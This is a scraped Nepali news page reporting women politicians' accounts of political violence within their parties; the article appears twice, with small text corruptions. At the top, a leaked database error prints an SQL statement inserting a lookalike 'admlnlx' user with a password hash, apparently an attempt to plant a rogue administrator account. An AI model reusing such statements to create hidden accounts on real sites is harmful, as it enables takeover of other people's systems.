WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmA43ObuY8EqH/D94k3e2YypW.Npd10', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 11:30:08', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
महिलामाथि राजनीतिक हिंसा – Gaule Khabar

महिलामाथि राजनीतिक हिंसा

महिलामाथि राजनीतिक हिंसा

काठमाडौँ, मंसिर २३ –

राजनीतिक दलका नेत्रीहरुले पार्टीभित्र पनि आफूहरुमाथि राजनीतिक c हुने गरेको बताएका छन् ।

महिलाहिंसाविरुद्ध १६ दिने अभियानको सन्दर्भमा सङ्कल्प नामक संस्थाले आज यहाँ आयोजना गरेको ‘महिलामाथि हुने राजनीतिक हिंसा’ विषयको छलफल कार्यक्रममा नेपाली काँग्रेसका केन्द्रीय सदस्य पुष्पा भुसालले राजनीतिमा महिलामाथि हिंसा हुने गरेको बताउनुभयो ।

उहाँले राज्यका प्रत्येक निकायमा उम्मेदवारी ३३ प्रतिशत महिलाको नभई परिणाम ३३ प्रतिशत महिलाको हुनुपर्नेमा जोड दिनु भयो ।
नयाँ शक्ति नेपालका नेत्री हिसिला यमीले राजनीतिक हिंसा पार्टीभित्र हुने गरेको उल्लेख गर्दै संसद्मै बोल्न खोज्दा ‘तिमीलाई रुप देखाउन ल्याएको’ भन्ने जस्ता लज्जास्पद शब्द प्रयोग हुने गरेको स्मरण गर्नुभयो ।

नेकपा ९एमाले० नेत्री कल्याणी रिमालले राजनीतिक दलहरुमा हिंसा गर्नेलाई प्रवेश नै गर्न दिन नहुनेमा जोड दिँदै कुन–कुन शब्दको प्रयोग गर्दा हिंसा हुन्छ भन्ने कुरालाई पनि बोल्दाखेरी ध्यान दिनुपर्ने आवश्यकता औँल्याउनुभयो ।

फेडो नामक संस्थाका महासचिव रेणु सिजापतीले महिलाले राजनीति गर्दा दोहोरो शोषणमा पर्नु परेको उल्लेख गर्दै परिवार र पार्टी दुवैमा महिलामाथि हिंसा हुने गरेको बताउनुभयो ।

सहभागीले राजनीतिमा शारीरिक तथा मानसिक हिंसा हुने गरेको, नेत्रीहरुको क्षमता र योग्यताको ख्याल नगरी निर्वाचन गर्दा र समानुपातिकमा टिकट दिँदा पनि पकेटको मान्छेलाई दिने गरेको गुनासो राखेका थिए । रासस ९श्रव्य सामग्री उपलब्ध छ०
काठमाडौँ, २३ मङ्सिर । राजनीतिक दलका नेत्रीहरुले पार्टीभित्र पनि आफूहरुमाथि राजनीतिक हिंसा हुने गरेको बताएका छन् ।

महिलाहिंसाविरुद्ध १६ दिने अभियानको सन्दर्भमा सङ्कल्प नामक संस्थाले आज यहाँ आयोजना गरेको ‘महिलामाथि हुने राजनीतिक हिंसा’ विषयको छलफल कार्यक्रममा नेपाली काँग्रेसका केन्द्रीय सदस्य पुष्पा भुसालले राजनीतिमा महिलामाथि हिंसा हुने गरेको बताउनुभयो ।

उहाँले राज्यका प्रत्येक निकायमा उम्मेदवारी ३३ प्रतिशत महिलाको नभई परिणाम ३३ प्रतिशत महिलाको हुनुपर्नेमा जोड दिनु भयो ।
नयाँ शक्ति नेपालका नेत्री हिसिला यमीले राजनीतिक हिंसा पार्टीभित्र हुने गरेको उल्लेख गर्दै संसद्मै बोल्न खोज्दा ‘तिमीलाई रुप देखाउन ल्याएको’ भन्ने जस्ता लज्जास्पद शब्द प्रयोग हुने गरेको स्मरण गर्नुभयो ।

नेकपा ९एमाले० नेत्री कल्याणी रिमालले राजनीतिक दलहरुमा हिंसा गर्नेलाई प्रवेश नै गर्न दिन नहुनेमा जोड दिँदै कुन–कुन शब्दको प्रयोग गर्दा हिंसा हुन्छ भन्ने कुरालाई पनि बोल्दाखेरी ध्यान दिनुपर्ने आवश्यकता औँल्याउनुभयो ।

फेडो नामक संस्थाका महासचिव रेणु सिजापतीले महिलाले राजनीति गर्दा दोहोरो शोषणमा पर्नु परेको उल्लेख गर्दै परिवार र पार्टी दुवैमा महिलामाथि हिंसा हुने गरेको बताउनुभयो ।

सहभागीले राजनीतिमा शारीरिक तथा मानसिक हिंसा हुने गरेको, नेत्रीहरुको क्षमता र योग्यताको ख्याल नगरी निर्वाचन गर्दा र समानुपातिकमा टिकट दिँदा पनि पकेटको मान्छेलाई दिने गरेको गुनासो राखेका थिए । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका